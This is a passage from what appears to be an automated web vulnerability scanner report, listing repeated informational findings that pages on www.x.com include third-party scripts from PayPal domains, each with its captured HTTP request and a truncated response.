<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.193. https://www.x.com/message/215254  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215254

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/215254 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35343035383b312c35333137323b312c35333235323b312c35333135383b312c34373636333b312c35333331323b312c35333331393b312c35333037353b312c35333334333b312c35333539323b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=103642 t=1313157517314351
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.194. https://www.x.com/message/215264  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215264

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/215264 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333838343b312c35333937373b312c35333135383b312c34373636333b312c35333137323b312c35343035383b312c35343036353b312c35333235323b312c35333331323b312c35333331393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:38 GMT; Path=/
Vary: User-Agent
JP: D=198038 t=1313157518364086
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.195. https://www.x.com/message/215276  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215276

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/215276 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333937373b312c35343036353b312c35343035383b312c34373636333b312c35333838343b312c35333135383b312c35333137323b312c35333235323b312c35333331323b312c35333331393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:38 GMT; Path=/
Vary: User-Agent
JP: D=113550 t=1313157518862899
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.196. https://www.x.com/message/215291  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215291

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/215291 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34373636333b312c35343035383b312c35333137323b312c35333135383b312c35333235323b312c35333331323b312c35333331393b312c35333037353b312c35333334333b312c35333539323b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=173612 t=1313157516935709
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.197. https://www.x.com/people  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=3394146 t=1313157260109910
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.198. https://www.x.com/people/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=2685593 t=1313157107815185
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.199. https://www.x.com/people/BaldGeek  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/BaldGeek

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/BaldGeek HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/xcommerce-blogs?view=blog
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:38:49 GMT; Path=/
Vary: User-Agent
JP: D=151430 t=1313156329683258
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.200. https://www.x.com/people/BaldGeek/blog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/BaldGeek/blog

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/BaldGeek/blog HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=127143 t=1313157109294622
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.201. https://www.x.com/people/CorinneSherman  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/CorinneSherman

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/CorinneSherman HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c38393433393b332c323030383b332c35333735313b332c35333436333b332c35353331393b332c35333437343b332c35373137393b332c3133363935343b332c3133373131353b332c36303039313b; Expires=Sun, 11-Sep-2011 13:51:54 GMT; Path=/
Vary: User-Agent
JP: D=153786 t=1313157114086096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.202. https://www.x.com/people/GiancarloUk2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/GiancarloUk2

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/GiancarloUk2 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38383139383b332c3131353037373b332c3130383730353b332c3131303734313b332c3131303831343b332c38323534333b332c3131353130373b332c38353530363b332c3131313737343b332c38373839383b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=109527 t=1313157149159421
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.203. https://www.x.com/people/IndieReign  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/IndieReign

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/IndieReign HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134303730373b332c38383139383b332c38373839383b332c3134313133383b332c38353530363b332c3134303532383b332c3131353130373b332c3131303734313b332c3131313737343b332c3131353037373b; Expires=Sun, 11-Sep-2011 13:52:30 GMT; Path=/
Vary: User-Agent
JP: D=98253 t=1313157150770204
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.204. https://www.x.com/people/JasonVenner  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/JasonVenner

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/JasonVenner HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c3133383538323b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b; Expires=Sun, 11-Sep-2011 13:51:49 GMT; Path=/
Vary: User-Agent
JP: D=146802 t=1313157109565171
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.205. https://www.x.com/people/MrcheckAPX  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/MrcheckAPX

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/MrcheckAPX HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:48 GMT; Path=/
Vary: User-Agent
JP: D=97089 t=1313157168042186
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.206. https://www.x.com/people/PP_Igor  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_Igor

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/PP_Igor HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c34383739343b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b; Expires=Sun, 11-Sep-2011 13:52:09 GMT; Path=/
Vary: User-Agent
JP: D=77818 t=1313157129602041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.207. https://www.x.com/people/PP_MTS_Andre  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Andre

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/PP_MTS_Andre HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b; Expires=Sun, 11-Sep-2011 13:52:06 GMT; Path=/
Vary: User-Agent
JP: D=85787 t=1313157126041615
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.208. https://www.x.com/people/PP_MTS_Chad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Chad

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/PP_MTS_Chad HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c33353136303b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b; Expires=Sun, 11-Sep-2011 13:52:04 GMT; Path=/
Vary: User-Agent
JP: D=167980 t=1313157123846369
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.209. https://www.x.com/people/PP_MTS_GuidoT  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_GuidoT

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/PP_MTS_GuidoT HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:07 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b; Expires=Sun, 11-Sep-2011 13:52:07 GMT; Path=/
Vary: User-Agent
JP: D=96030 t=1313157127847926
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.210. https://www.x.com/people/PP_MTS_Magarvin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Magarvin

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/PP_MTS_Magarvin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
